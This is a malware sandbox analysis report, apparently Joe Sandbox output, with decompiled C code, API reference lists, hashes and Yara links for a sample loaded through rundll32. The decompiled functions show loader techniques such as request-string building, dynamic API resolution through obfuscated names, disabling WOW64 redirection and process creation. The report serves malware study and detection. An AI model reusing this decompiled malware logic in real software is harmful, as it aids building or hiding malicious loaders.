				_t14 = _t81 + 0xc2b33b; // 0x74636126
				_t156 = 0 | _t180 == 0x00000000;
				_t160 = _t159 + wsprintfA(_t159 + _t143, _t14, _t180 == 0);
				_t85 =  *0xc2a31c; // 0x50c95e0
				_t175 = _t174 + 0x1c;
				if(_t85 != 0) {
					_t135 =  *0xc2a2d4; // 0x449d5a8
					_t18 = _t135 + 0xc2b8e9; // 0x3d736f26
					_t138 = wsprintfA(_t160 + _t143, _t18, _t85);
					_t175 = _t175 + 0xc;
					_t160 = _t160 + _t138;
				}
				_t86 =  *0xc2a32c; // 0x50c95b0
				if(_t86 != 0) {
					_t132 =  *0xc2a2d4; // 0x449d5a8
					_t20 = _t132 + 0xc2b685; // 0x73797326
					wsprintfA(_t160 + _t143, _t20, _t86);
					_t175 = _t175 + 0xc;
				}
				_t161 =  *0xc2a37c; // 0x50c9630
				_t88 = E00C23A66(0xc2a00a, _t161 + 4);
				_t167 = 0;
				_v12 = _t88;
				if(_t88 == 0) {
					L28:
					HeapFree( *0xc2a290, _t167, _t143);
					return _a20;
				} else {
					_t91 = RtlAllocateHeap( *0xc2a290, 0, 0x800);
					_a8 = _t91;
					if(_t91 == 0) {
						L27:
						HeapFree( *0xc2a290, _t167, _v12);
						goto L28;
					}
					E00C22C46(GetTickCount());
					_t95 =  *0xc2a37c; // 0x50c9630
					__imp__(_t95 + 0x40);
					asm("lock xadd [eax], ecx");
					_t99 =  *0xc2a37c; // 0x50c9630
					__imp__(_t99 + 0x40);
					_t101 =  *0xc2a37c; // 0x50c9630
					_t163 = E00C27156(1, _t156, _t143,  *_t101);
					_v20 = _t163;
					asm("lock xadd [eax], ecx");
					if(_t163 == 0) {
						L26:
						HeapFree( *0xc2a290, _t167, _a8);
						goto L27;
					}
					StrTrimA(_t163, 0xc292ac);
					_push(_t163);
					_t107 = E00C25C8D();
					_v8 = _t107;
					if(_t107 == 0) {
						L25:
						HeapFree( *0xc2a290, _t167, _t163);
						goto L26;
					}
					 *_t163 = 0;
					__imp__(_a8, _v12);
					_t168 = __imp__;
					 *_t168(_a8, _v8);
					_t111 = E00C23FC1( *_t168(_a8, _t163), _a8);
					_a4 = _t111;
					if(_t111 == 0) {
						_a20 = 8;
						L23:
						E00C23546();
						L24:
						HeapFree( *0xc2a290, 0, _v8);
						_t167 = 0;
						goto L25;
					}
					_t115 = E00C258A0(_t143, 0xffffffffffffffff, _t163,  &_v16);
					_a20 = _t115;
					if(_t115 == 0) {
						_t171 = _v16;
						_a20 = E00C2627E(_t171, _a4, _a12, _a16);
						_t123 =  *((intOrPtr*)(_t171 + 8));
						 *((intOrPtr*)( *_t123 + 0x80))(_t123);
						_t125 =  *((intOrPtr*)(_t171 + 8));
						 *((intOrPtr*)( *_t125 + 8))(_t125);
						_t127 =  *((intOrPtr*)(_t171 + 4));
						 *((intOrPtr*)( *_t127 + 8))(_t127);
						_t129 =  *_t171;
						 *((intOrPtr*)( *_t129 + 8))(_t129);
						E00C213CC(_t171);
					}
					if(_a20 != 0x10d2) {
						L18:
						if(_a20 == 0) {
							_t117 = _a12;
							if(_t117 != 0) {
								_t164 =  *_t117;
								_t169 =  *_a16;
								wcstombs( *_t117,  *_t117,  *_a16);
								_t120 = E00C237F6(_t164, _t164, _t169 >> 1);
								_t163 = _v20;
								 *_a16 = _t120;
							}
						}
						goto L21;
					} else {
						if(_a12 != 0) {
							L21:
							E00C213CC(_a4);
							if(_a20 == 0 || _a20 == 0x10d2) {
								goto L24;
							} else {
								goto L23;
							}
						}
						_a20 = _a20 & 0x00000000;
						goto L18;
					}
				}
			}

0x00c2254c
0x00c2254c
0x00c2254c
0x00c22555
0x00c2255a
0x00c22561
0x00c22563
0x00c22563
0x00c22570
0x00c2257b
0x00c2257e
0x00c22589
0x00c2258c
0x00c22591
0x00c22594
0x00c22599
0x00c2259c
0x00c225a8
0x00c225b5
0x00c225b7
0x00c225bd
0x00c225c2
0x00c225cd
0x00c225cf
0x00c225d2
0x00c225d8
0x00c225da
0x00c225e2
0x00c225ed
0x00c225ef
0x00c225f2
0x00c225f2
0x00c225f4
0x00c225fb
0x00c22600
0x00c2260d
0x00c2260f
0x00c22614
0x00c2261c
0x00c2261f
0x00c22625
0x00c22630
0x00c22632
0x00c22637
0x00c2263c
0x00c2263f
0x00c22644
0x00c2264f
0x00c22651
0x00c22654
0x00c22654
0x00c22656
0x00c2265d
0x00c22660
0x00c22665
0x00c2266f
0x00c22671
0x00c22671
0x00c22674
0x00c22682
0x00c22687
0x00c2268b
0x00c2268e
0x00c22858
0x00c22860
0x00c2286d
0x00c22694
0x00c226a0
0x00c226a8
0x00c226ab
0x00c22848
0x00c22852
0x00000000
0x00c22852
0x00c226b7
0x00c226bc
0x00c226c5
0x00c226d6
0x00c226da
0x00c226e3
0x00c226e9
0x00c226f6
0x00c226fd
0x00c22706
0x00c2270c
0x00c22838
0x00c22842
0x00000000
0x00c22842
0x00c22718
0x00c2271e
0x00c2271f
0x00c22726
0x00c22729
0x00c2282a
0x00c22832
0x00000000
0x00c22832
0x00c22732
0x00c22738
0x00c22741
0x00c2274a
0x00c22755
0x00c2275c
0x00c2275f
0x00c22870
0x00c22812
0x00c22812
0x00c22817
0x00c22822
0x00c22828
0x00000000
0x00c22828
0x00c22769
0x00c22770
0x00c22773
0x00c22778
0x00c22788
0x00c2278b
0x00c22791
0x00c22797
0x00c2279d
0x00c227a0
0x00c227a6
0x00c227a9
0x00c227ae
0x00c227b2
0x00c227b2
0x00c227be
0x00c227ca
0x00c227ce
0x00c227d0
0x00c227d5
0x00c227d7
0x00c227dc
0x00c227e1
0x00c227ee
0x00c227f6
0x00c227f9
0x00c227f9
0x00c227d5
0x00000000
0x00c227c0
0x00c227c4
0x00c227fb
0x00c227fe
0x00c22807
0x00000000
0x00000000
0x00000000
0x00000000
0x00c22807
0x00c227c6
0x00000000
0x00c227c6
0x00c227be

APIs

GetTickCount.KERNEL32 ref: 00C22563
wsprintfA.USER32 ref: 00C225B0
wsprintfA.USER32 ref: 00C225CD
wsprintfA.USER32 ref: 00C225ED
wsprintfA.USER32 ref: 00C2260B
wsprintfA.USER32 ref: 00C2262E
wsprintfA.USER32 ref: 00C2264F
wsprintfA.USER32 ref: 00C2266F
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00C226A0
GetTickCount.KERNEL32 ref: 00C226B1
RtlEnterCriticalSection.NTDLL(050C95F0), ref: 00C226C5
RtlLeaveCriticalSection.NTDLL(050C95F0), ref: 00C226E3

Part of subcall function 00C27156: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,00C24A9F,00000000,050C9630), ref: 00C27181
Part of subcall function 00C27156: lstrlen.KERNEL32(00000000,?,00000000,00C24A9F,00000000,050C9630), ref: 00C27189
Part of subcall function 00C27156: strcpy.NTDLL ref: 00C271A0
Part of subcall function 00C27156: lstrcat.KERNEL32(00000000,00000000), ref: 00C271AB
Part of subcall function 00C27156: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,00C24A9F,?,00000000,00C24A9F,00000000,050C9630), ref: 00C271C8

StrTrimA.SHLWAPI(00000000,00C292AC,?,050C9630), ref: 00C22718

Part of subcall function 00C25C8D: lstrlen.KERNEL32(050C887A,00000000,00000000,00000000,00C24AC6,00000000), ref: 00C25C9D
Part of subcall function 00C25C8D: lstrlen.KERNEL32(?), ref: 00C25CA5
Part of subcall function 00C25C8D: lstrcpy.KERNEL32(00000000,050C887A), ref: 00C25CB9
Part of subcall function 00C25C8D: lstrcat.KERNEL32(00000000,?), ref: 00C25CC4

lstrcpy.KERNEL32(00000000,?), ref: 00C22738
lstrcat.KERNEL32(00000000,?), ref: 00C2274A
lstrcat.KERNEL32(00000000,00000000), ref: 00C22750

Part of subcall function 00C23FC1: lstrlen.KERNEL32(?,00000000,050C9CD0,7742C740,00C235B6,050C9ED5,00C2454B,00C2454B,?,00C2454B,?,69B25F44,E8FA7DD7,00000000), ref: 00C23FC8
Part of subcall function 00C23FC1: mbstowcs.NTDLL ref: 00C23FF1
Part of subcall function 00C23FC1: memset.NTDLL ref: 00C24003

wcstombs.NTDLL ref: 00C227E1

Part of subcall function 00C2627E: SysAllocString.OLEAUT32(00000000), ref: 00C262BF

Part of subcall function 00C213CC: RtlFreeHeap.NTDLL(00000000,00000000,00C220F3,00000000,00000000,?,00000000,?,?,?,?,?,00C268A9,00000000,?,00000001), ref: 00C213D8

HeapFree.KERNEL32(00000000,?,00000000), ref: 00C22822
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00C22832
HeapFree.KERNEL32(00000000,00000000,?,050C9630), ref: 00C22842
HeapFree.KERNEL32(00000000,?), ref: 00C22852
HeapFree.KERNEL32(00000000,?), ref: 00C22860

Memory Dump Source

Source File: 00000017.00000002.733621809.0000000000C21000.00000020.00020000.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000017.00000002.733593892.0000000000C20000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733678494.0000000000C29000.00000002.00020000.sdmp Download File
Associated: 00000017.00000002.733725240.0000000000C2A000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733761318.0000000000C2C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_c20000_rundll32.jbxd

Similarity

API ID: Heapwsprintf$Free$lstrlen$lstrcat$CountCriticalSectionTickTrimlstrcpy$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
String ID:
API String ID: 972889839-0
Opcode ID: 651881c3fbc4716e6810125b726c9cf354adbf11363f5f9ec5b81d8b1276d5ef
Instruction ID: 2b5817db6a2d22178120927e6df5e0c0360a1f26f88ed9a8fc4def69de23e8a2
Opcode Fuzzy Hash: 651881c3fbc4716e6810125b726c9cf354adbf11363f5f9ec5b81d8b1276d5ef
Instruction Fuzzy Hash: 75A13571910119EFDB21DF68EC88FAE3BA9EF48350F144025F909C7A61DB35DA12DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 703410BC, Relevance: 30.1, APIs: 15, Strings: 2, Instructions: 357COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 7034112B
_free.LIBCMT ref: 70341141
_free.LIBCMT ref: 70341154
_free.LIBCMT ref: 70341169
_free.LIBCMT ref: 7034117E
GetCPInfo.KERNEL32(?,?), ref: 703411C8

Part of subcall function 703478F6: _free.LIBCMT ref: 70347961

_free.LIBCMT ref: 70341433
_free.LIBCMT ref: 70341446
_free.LIBCMT ref: 70341454
_free.LIBCMT ref: 7034145F
_free.LIBCMT ref: 703414A1
_free.LIBCMT ref: 703414A9
_free.LIBCMT ref: 703414AF
_free.LIBCMT ref: 703414B7
_free.LIBCMT ref: 703414C5

Strings

h|7p, xrefs: 703414FA
z7p, xrefs: 703414F0

Memory Dump Source

Source File: 00000017.00000002.735940660.000000007033F000.00000020.00020000.sdmp, Offset: 7033F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7033f000_rundll32.jbxd

Similarity

API ID: _free$Info
String ID: h|7p$z7p
API String ID: 2509303402-3018727128
Opcode ID: ceb2d2335d88738f4a48ad07be5bd00d98323ffe03d1c1203c57dda286d045ba
Instruction ID: 4faff333468259b837ab0954e173728814977ab7ca3d7829db8a075ad3b35933
Opcode Fuzzy Hash: ceb2d2335d88738f4a48ad07be5bd00d98323ffe03d1c1203c57dda286d045ba
Instruction Fuzzy Hash: 1DD19B71A00609AFDB11CFB5C881BBEBBF5BF09300F245529F49AAB351D770A946CB50

Uniqueness

Uniqueness Score: -1.00%

Function 7034C0E2, Relevance: 19.6, APIs: 13, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 7034C126

Part of subcall function 7034C565: _free.LIBCMT ref: 7034C582
Part of subcall function 7034C565: _free.LIBCMT ref: 7034C594
Part of subcall function 7034C565: _free.LIBCMT ref: 7034C5A6
Part of subcall function 7034C565: _free.LIBCMT ref: 7034C5B8
Part of subcall function 7034C565: _free.LIBCMT ref: 7034C5CA
Part of subcall function 7034C565: _free.LIBCMT ref: 7034C5DC
Part of subcall function 7034C565: _free.LIBCMT ref: 7034C5EE
Part of subcall function 7034C565: _free.LIBCMT ref: 7034C600
Part of subcall function 7034C565: _free.LIBCMT ref: 7034C612
Part of subcall function 7034C565: _free.LIBCMT ref: 7034C624
Part of subcall function 7034C565: _free.LIBCMT ref: 7034C636
Part of subcall function 7034C565: _free.LIBCMT ref: 7034C648
Part of subcall function 7034C565: _free.LIBCMT ref: 7034C65A

_free.LIBCMT ref: 7034C11B

Part of subcall function 70341970: HeapFree.KERNEL32(00000000,00000000,?,7033F811,00000000), ref: 70341986
Part of subcall function 70341970: GetLastError.KERNEL32(?,?,7033F811,00000000), ref: 70341998

_free.LIBCMT ref: 7034C13D
_free.LIBCMT ref: 7034C152
_free.LIBCMT ref: 7034C15D
_free.LIBCMT ref: 7034C17F
_free.LIBCMT ref: 7034C192
_free.LIBCMT ref: 7034C1A0
_free.LIBCMT ref: 7034C1AB
_free.LIBCMT ref: 7034C1E3
_free.LIBCMT ref: 7034C1EA
_free.LIBCMT ref: 7034C207
_free.LIBCMT ref: 7034C21F

Memory Dump Source

Source File: 00000017.00000002.735940660.000000007033F000.00000020.00020000.sdmp, Offset: 7033F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7033f000_rundll32.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 57ebe735fdfb5a761483f60f7ba3e4964e0472011cd453df8ce300bafe5163c3
Instruction ID: db80bb2cfb6ccc9396923a41c76450549ad112e66e40590c723dd470c4f495c5
Opcode Fuzzy Hash: 57ebe735fdfb5a761483f60f7ba3e4964e0472011cd453df8ce300bafe5163c3
Instruction Fuzzy Hash: 29314C32610700EFDB519A79D941B6E73E9AF01690F256419F05EDF2A1DF70FC81CA54

Uniqueness

Uniqueness Score: -1.00%

Function 70340821, Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273COMMON

Download Yara Rule

APIs

Part of subcall function 703404EF: CreateFileW.KERNEL32(?,?,?,?,?,?,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 7034050C

GetLastError.KERNEL32 ref: 70340935
__dosmaperr.LIBCMT ref: 7034093C
GetFileType.KERNEL32(00000000), ref: 70340948
GetLastError.KERNEL32 ref: 70340952
__dosmaperr.LIBCMT ref: 7034095B
CloseHandle.KERNEL32(00000000), ref: 7034097B
CloseHandle.KERNEL32(?), ref: 70340AC8
GetLastError.KERNEL32 ref: 70340AFA
__dosmaperr.LIBCMT ref: 70340B01

Strings

H, xrefs: 70340A86

Memory Dump Source

Source File: 00000017.00000002.735940660.000000007033F000.00000020.00020000.sdmp, Offset: 7033F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7033f000_rundll32.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: d703ef9a8717ade452580d42e91c3078b161ecc590ea7e3972f46741c2242af7
Instruction ID: 7f3f80265e0a1c9b514f3051f6803f43c11e5fb5c1b06c9cc9ce6bbd42e88dd4
Opcode Fuzzy Hash: d703ef9a8717ade452580d42e91c3078b161ecc590ea7e3972f46741c2242af7
Instruction Fuzzy Hash: 43A11232B041488FDF0A9F68C891BAE3BF5EB46324F25115DF816EF2A1C7359952CB61

Uniqueness

Uniqueness Score: -1.00%

Function 70344445, Relevance: 15.1, APIs: 10, Instructions: 69COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 7034445B

Part of subcall function 70341970: HeapFree.KERNEL32(00000000,00000000,?,7033F811,00000000), ref: 70341986
Part of subcall function 70341970: GetLastError.KERNEL32(?,?,7033F811,00000000), ref: 70341998

_free.LIBCMT ref: 70344467
_free.LIBCMT ref: 70344472
_free.LIBCMT ref: 7034447D
_free.LIBCMT ref: 70344488
_free.LIBCMT ref: 70344493
_free.LIBCMT ref: 7034449E
_free.LIBCMT ref: 703444A9
_free.LIBCMT ref: 703444B4
_free.LIBCMT ref: 703444C2

Memory Dump Source

Source File: 00000017.00000002.735940660.000000007033F000.00000020.00020000.sdmp, Offset: 7033F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7033f000_rundll32.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: bf1514912ade1db7612399cf5a342a5e5ca055cf75ac3eec537989925a02a23f
Instruction ID: 8a482baa4ca7270f09273c414435c94e61a68e67e6943dd3dcc67fcd334949e5
Opcode Fuzzy Hash: bf1514912ade1db7612399cf5a342a5e5ca055cf75ac3eec537989925a02a23f
Instruction Fuzzy Hash: AA21A376900108FFCB41DFA4C891DEE7BF8AF08280B1491A6F5159F221DB71EA45CBC0

Uniqueness

Uniqueness Score: -1.00%

Function 70345A6A, Relevance: 13.8, APIs: 9, Instructions: 301COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.735940660.000000007033F000.00000020.00020000.sdmp, Offset: 7033F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7033f000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f681eb172b5f3a55edfa049a64d1e829dd98748a03e3ba4bf3f8090749f39ef
Instruction ID: ce190d6d6fc4421818ee3859c33ac40526c85d2910dc9f85acc4016ec1c23fb7
Opcode Fuzzy Hash: 3f681eb172b5f3a55edfa049a64d1e829dd98748a03e3ba4bf3f8090749f39ef
Instruction Fuzzy Hash: 2CC19D71E042459FDB06CF98C884BBDBBF9AF4A310F11515AF8069F392C775A942CB60

Uniqueness

Uniqueness Score: -1.00%

Function 7034CA83, Relevance: 13.7, APIs: 9, Instructions: 200COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 7034CAF1
_free.LIBCMT ref: 7034CAFD
_free.LIBCMT ref: 7034CC26
_free.LIBCMT ref: 7034CC31

Memory Dump Source

Source File: 00000017.00000002.735940660.000000007033F000.00000020.00020000.sdmp, Offset: 7033F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7033f000_rundll32.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: ab9a4b9b0d08a10abdde79a9fee80b1c5724923c97173cfe9b0204fd55170dc3
Instruction ID: 07988e2f4850e02d68a05a3eacb69ee52bf182537eca5e40a0b1f63dbacb3549
Opcode Fuzzy Hash: ab9a4b9b0d08a10abdde79a9fee80b1c5724923c97173cfe9b0204fd55170dc3
Instruction Fuzzy Hash: 1861EF72910704AFD751CF64C882BAEB7F9EF44750F215169F95AEF290EB30AC428B90

Uniqueness

Uniqueness Score: -1.00%

Function 00C26414, Relevance: 13.6, APIs: 9, Instructions: 112
stringCOMMON

Download Yara Rule

C-Code - Quality: 27%

			E00C26414(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				long _v16;
				intOrPtr _v20;
				signed int _v24;
				void* __esi;
				long _t43;
				intOrPtr _t44;
				intOrPtr _t46;
				void* _t48;
				void* _t49;
				void* _t50;
				intOrPtr _t54;
				intOrPtr _t57;
				void* _t58;
				void* _t59;
				void* _t60;
				intOrPtr _t66;
				void* _t71;
				void* _t74;
				intOrPtr _t75;
				void* _t77;
				intOrPtr _t79;
				intOrPtr* _t80;
				intOrPtr _t91;

				_t79 =  *0xc2a38c; // 0x50c9bd8
				_v24 = 8;
				_t43 = GetTickCount();
				_push(5);
				_t74 = 0xa;
				_v16 = _t43;
				_t44 = E00C22292(_t74,  &_v16);
				_v8 = _t44;
				if(_t44 == 0) {
					_v8 = 0xc291ac;
				}
				_t46 = E00C216F4(_t79);
				_v12 = _t46;
				if(_t46 != 0) {
					_t80 = __imp__;
					_t48 =  *_t80(_v8, _t71);
					_t49 =  *_t80(_v12);
					_t50 =  *_t80(_a4);
					_t54 = E00C25FBC(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
					_v20 = _t54;
					if(_t54 != 0) {
						_t75 =  *0xc2a2d4; // 0x449d5a8
						_t16 = _t75 + 0xc2bab8; // 0x530025
						 *0xc2a138(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
						_push(4);
						_t77 = 5;
						_t57 = E00C22292(_t77,  &_v16);
						_v8 = _t57;
						if(_t57 == 0) {
							_v8 = 0xc291b0;
						}
						_t58 =  *_t80(_v8);
						_t59 =  *_t80(_v12);
						_t60 =  *_t80(_a4);
						_t91 = E00C25FBC(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
						if(_t91 == 0) {
							E00C213CC(_v20);
						} else {
							_t66 =  *0xc2a2d4; // 0x449d5a8
							_t31 = _t66 + 0xc2bbd8; // 0x73006d
							 *0xc2a138(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
							 *_a16 = _v20;
							_v24 = _v24 & 0x00000000;
							 *_a20 = _t91;
						}
					}
					E00C213CC(_v12);
				}
				return _v24;
			}

0x00c2641c
0x00c26422
0x00c26429
0x00c2642f
0x00c26433
0x00c26437
0x00c2643a
0x00c26441
0x00c26444
0x00c26446
0x00c26446
0x00c2644f
0x00c26456
0x00c26459
0x00c2645f
0x00c26469
0x00c26472
0x00c26479
0x00c26492
0x00c26499
0x00c2649c
0x00c264a5
0x00c264ae
0x00c264bf
0x00c264c8
0x00c264cc
0x00c264d0
0x00c264d7
0x00c264da
0x00c264dc
0x00c264dc
0x00c264e6
0x00c264ef
0x00c264f6
0x00c2650e
0x00c26512
0x00c2654f
0x00c26514
0x00c26517
0x00c2651f
0x00c26530
0x00c2653c
0x00c26544
0x00c26548
0x00c26548
0x00c26512
0x00c26557
0x00c2655c
0x00c26563

APIs

GetTickCount.KERNEL32 ref: 00C26429
lstrlen.KERNEL32(?,80000002,00000005), ref: 00C26469
lstrlen.KERNEL32(00000000), ref: 00C26472
lstrlen.KERNEL32(00000000), ref: 00C26479
lstrlenW.KERNEL32(80000002), ref: 00C26486
lstrlen.KERNEL32(?,00000004), ref: 00C264E6
lstrlen.KERNEL32(?), ref: 00C264EF
lstrlen.KERNEL32(?), ref: 00C264F6
lstrlenW.KERNEL32(?), ref: 00C264FD

Part of subcall function 00C213CC: RtlFreeHeap.NTDLL(00000000,00000000,00C220F3,00000000,00000000,?,00000000,?,?,?,?,?,00C268A9,00000000,?,00000001), ref: 00C213D8

Memory Dump Source

Source File: 00000017.00000002.733621809.0000000000C21000.00000020.00020000.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000017.00000002.733593892.0000000000C20000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733678494.0000000000C29000.00000002.00020000.sdmp Download File
Associated: 00000017.00000002.733725240.0000000000C2A000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733761318.0000000000C2C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_c20000_rundll32.jbxd

Similarity

API ID: lstrlen$CountFreeHeapTick
String ID:
API String ID: 2535036572-0
Opcode ID: 895b2f8870d1e906d7e9d422cfd835737b6e94dfcaf2f5d602da7c4ca9cfea05
Instruction ID: 691b2f264785eb6586e9f54e9b6c77f4167ac690df1a1a89485f906559934ca2
Opcode Fuzzy Hash: 895b2f8870d1e906d7e9d422cfd835737b6e94dfcaf2f5d602da7c4ca9cfea05
Instruction Fuzzy Hash: 1C414C76C00229FBCF11AFA4DD09A9E7BB5EF48314F154050ED04A7621D7359B15EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00C22F12, Relevance: 13.6, APIs: 9, Instructions: 110
librarymemoryloaderCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E00C22F12(void* __eax, void* __ecx) {
				long _v8;
				void* _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t39;
				intOrPtr _t43;
				intOrPtr _t50;
				void* _t52;
				intOrPtr _t53;
				void* _t61;
				intOrPtr* _t66;
				intOrPtr* _t73;
				intOrPtr* _t76;

				_t1 = __eax + 0x14; // 0x74183966
				_t71 =  *_t1;
				_t39 = E00C26ACC(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
				_v8 = _t39;
				if(_t39 != 0) {
					L12:
					return _v8;
				}
				E00C277FF( *((intOrPtr*)(_t71 + 0xc)),  *((intOrPtr*)(_t71 + 8)), _v12);
				_t43 = _v12(_v12);
				_v8 = _t43;
				if(_t43 == 0 && ( *0xc2a2b8 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t50 =  *0xc2a2d4; // 0x449d5a8
					_t18 = _t50 + 0xc2b55b; // 0x73797325
					_t52 = E00C24B6B(_t18);
					_v12 = _t52;
					if(_t52 == 0) {
						_v8 = 8;
					} else {
						_t53 =  *0xc2a2d4; // 0x449d5a8
						_t20 = _t53 + 0xc2b73d; // 0x50c8ce5
						_t21 = _t53 + 0xc2b0af; // 0x4e52454b
						_t66 = GetProcAddress(GetModuleHandleA(_t21), _t20);
						if(_t66 == 0) {
							_v8 = 0x7f;
						} else {
							_t73 = __imp__;
							_v108 = 0x44;
							 *_t73(0);
							_t61 =  *_t66(0, _v12, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32);
							 *_t73(1);
							if(_t61 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0xc2a290, 0, _v12);
					}
				}
				_t76 = _v16;
				 *((intOrPtr*)(_t76 + 0x18))( *((intOrPtr*)(_t76 + 0x1c))( *_t76));
				E00C213CC(_t76);
				goto L12;
			}

0x00c22f1b
0x00c22f1b
0x00c22f29
0x00c22f32
0x00c22f35
0x00c23047
0x00c2304e
0x00c2304e
0x00c22f44
0x00c22f4c
0x00c22f51
0x00c22f54
0x00c22f69
0x00c22f6f
0x00c22f70
0x00c22f73
0x00c22f79
0x00c22f7c
0x00c22f81
0x00c22f89
0x00c22f90
0x00c22f97
0x00c22f9a
0x00c2302e
0x00c22fa0
0x00c22fa0
0x00c22fa5
0x00c22fac
0x00c22fc0
0x00c22fc4
0x00c23015
0x00c22fc6
0x00c22fc6
0x00c22fcd
0x00c22fd4
0x00c22fec
0x00c22ff2
0x00c22ff6
0x00c23010
0x00c22ff8
0x00c23001
0x00c23006
0x00c23006
0x00c22ff6
0x00c23026
0x00c23026
0x00c22f9a
0x00c23035
0x00c2303e
0x00c23042
0x00000000

APIs

Part of subcall function 00C26ACC: GetModuleHandleA.KERNEL32(4C44544E,00000020,74183966,00000000,00000000,?,?,?,00C22F2E,?,?,?,?,00000000,00000000), ref: 00C26AF1
Part of subcall function 00C26ACC: GetProcAddress.KERNEL32(00000000,7243775A), ref: 00C26B13
Part of subcall function 00C26ACC: GetProcAddress.KERNEL32(00000000,614D775A), ref: 00C26B29
Part of subcall function 00C26ACC: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 00C26B3F
Part of subcall function 00C26ACC: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 00C26B55
Part of subcall function 00C26ACC: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 00C26B6B

memset.NTDLL ref: 00C22F7C

Part of subcall function 00C24B6B: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00C22F95,73797325), ref: 00C24B7C
Part of subcall function 00C24B6B: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 00C24B96

GetModuleHandleA.KERNEL32(4E52454B,050C8CE5,73797325), ref: 00C22FB3
GetProcAddress.KERNEL32(00000000), ref: 00C22FBA
Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 00C22FD4
Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 00C22FF2
CloseHandle.KERNEL32(00000000), ref: 00C23001
CloseHandle.KERNEL32(?), ref: 00C23006
GetLastError.KERNEL32 ref: 00C2300A
HeapFree.KERNEL32(00000000,?), ref: 00C23026

Memory Dump Source

Source File: 00000017.00000002.733621809.0000000000C21000.00000020.00020000.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000017.00000002.733593892.0000000000C20000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733678494.0000000000C29000.00000002.00020000.sdmp Download File
Associated: 00000017.00000002.733725240.0000000000C2A000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733761318.0000000000C2C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_c20000_rundll32.jbxd

Similarity

API ID: AddressProc$HandleWow64$CloseEnableEnvironmentExpandModuleRedirectionStrings$ErrorFreeHeapLastmemset
String ID:
API String ID: 91923200-0
Opcode ID: 12d535a437d009893c90e707400afae1b783eea4d533252dfe802845e2a7b059
Instruction ID: 9337dda40176b4638d76eba057c70617081ac951943cd5ac4619e3c6d87168c1
Opcode Fuzzy Hash: 12d535a437d009893c90e707400afae1b783eea4d533252dfe802845e2a7b059
Instruction Fuzzy Hash: 6F314A71900229FFCB21AFA4EC88EDEBFB9EF08740F104051E605A7921D775AA45DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 70346DA5, Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 264COMMON

Download Yara Rule

APIs

Part of subcall function 70344589: GetLastError.KERNEL32(?,?,?,70340192), ref: 7034458E
